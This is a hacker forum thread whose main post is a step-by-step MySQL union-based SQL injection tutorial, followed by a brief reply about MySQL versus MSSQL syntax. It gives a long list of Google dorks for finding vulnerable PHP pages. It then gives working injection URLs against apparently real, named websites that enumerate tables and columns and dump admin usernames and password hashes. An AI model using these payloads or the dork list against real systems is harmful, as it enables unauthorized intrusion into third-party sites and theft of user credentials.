next »

[D4rk357]

1. USE DORKS TO FIND SITES

Code:

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?id=
inurl:play_old.php?id=
inurl:newsitem.php?id=
inurl:readnews.php?id=
inurl:top10.php?id=
inurl:historialeer.php?id=
inurl:reagir.php?id=
inurl:Stray-Questions-View.php?id=
inurl:forum_bds.php?id=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?id=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?id=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?id=
inurl:review.php?id=
inurl:iniziativa.php?id=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?id=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

2.CHECK WHETHER THE SITE IS VULNERABLE

put a ' infront of the page .

if it does not reload in its original format it is vulnerable .

eg.

Nothing is shown on page So it might be possible it is vulnerable

P.S:
if you get error like this it is not MYSQL injection it's MSSQL


/ Microsoft Access ODBC driver /

/ Open quotation /

/ Microsoft Amos DB provider for Oracle /

/ Division by zero in /

so find a good MSSQL tutorial

3.FINDING NUMBER OF COLUMNS IN SQL DATABASE

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 1-- NO ERROR

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 10--  ERROR

SO COLUMN NUMBER IS BETWEEN 1 AND 10

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 5--  ERROR
SO COLUMN NUMBER IS BETWEEN 1 AND 5

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 4-- NO ERROR
SO COLUMNS IN DATABASE IS 4

4:CHECK IF UNION STATEMENT IS WORKING AND FIND VULNERABLE COLUMNS

http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT 1,2,3,4--

watch out for minus i placed before web page number .
we do it so website only returns header and we can see useful information .
see the numbers it is showing on page .
that are the injectable column numbers

5:CHECK DATABASE VERSION

http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT @@version,2,3,4--

VERSION 5.0.83 cheers

6:FINDING TABLE NAMES

This sub-section is divided into two parts :

6A:WHEN ALL TABLE NAME IS SHOWED AT ONCE

http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT table_name,2,3,4 from information_schema.tables--

in this case we will see which tables are interesting
tblUsers intrigues me in this case :hehe:

6B:WHEN ONLY ONE TABLE NAME IS SHOWN THAT ALSO SOMETHING LIKE CHARACTER_SETS
 here we use limit statements
example :
check this


http://www.medicalmarijuanainformation.com/therapeuticuses/patientGroups.php?groupID=-13 union select all table_name from information_schema.tables--


you will get same problem here which i mentioned above.

so your way forward will be

http://www.medicalmarijuanainformation.com/therapeuticuses/patientGroups.php?groupID=-13 union all select table_name from information_schema.tables limit 0,1--


then

http://www.medicalmarijuanainformation.com/therapeuticuses/patientGroups.php?groupID=-13 union all select table_name from information_schema.tables limit 1,1--

then

http://www.medicalmarijuanainformation.com/therapeuticuses/patientGroups.php?groupID=-13 union all select table_name from information_schema.tables limit 2,1--

till

http://www.medicalmarijuanainformation.com/therapeuticuses/patientGroups.php?groupID=-13 union all select table_name from information_schema.tables limit 17,1--

Use magic quotes trick to find column name along with limit ..

7. FIND COLUMNS IN DATABASE
 this sub section has been divided into 2 parts :

7A.FINDING COLUMNS IN A PARTICULAR TABLE

http://www.medicalmarijuanainformation.com/therapeuticuses/patientGroups.php?groupID=-13 union all select column_name from information_schema.columns where table_name='adminusers' limit 0,1--
here only one column name is displaying so i am using limit statement otherwise it would be unnecessary .
It only works if MAGIC QUOTES is off .
single quotes i placed table name is important .
IF IT doesn't work it try hexing the table name .
Google to find a hex converter and put in table name there and get it's hex .

7B.FINDING ALL COLUMN NAMES

http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT COLUMN_NAME,2,3,4 from information_schema.COLUMNS--

If only one column name is displaying then use the limit statement like shown above

8.DISPLAYING USER NAMES AND PASSWORDS
0x3a is hex form of ":".

http://www.medicalmarijuanainformation.com/therapeuticuses/patientGroups.php?groupID=-13 union all select group_concat(adminID,0x3a,adminUsername,0x3a,adminPassword) from adminusers --

http://www.pseb.org.pk/page.php?nid=-11 union all select concat(user_id,0x3a,password,0x3a,email),2,3,4 from tblUsers --

cracking hash , finding the hash type , finding admin page etc are out of scope of this tutorial .

i will make another tut for it soon ..

[|-|!/\/\@|<@/?]

nice tutorial bro

but i have a small doubt ..... whatz the diff b/w mysql injection nd sql injection ad both are using same comands

[D4rk357]

nice tutorial bro

but i have a small doubt ..... whatz the diff b/w mysql injection nd sql injection ad both are using same comands

Nice Question .

Firstly you are incorrect to say that mysql and other Sql commands are same .

commands change according to Sql.

Commands for MSSQl are different from MYSQL .

Also commands for MYSQl version< 5 changes a bit and you have to brute force to get Table and Column names as there is no information schema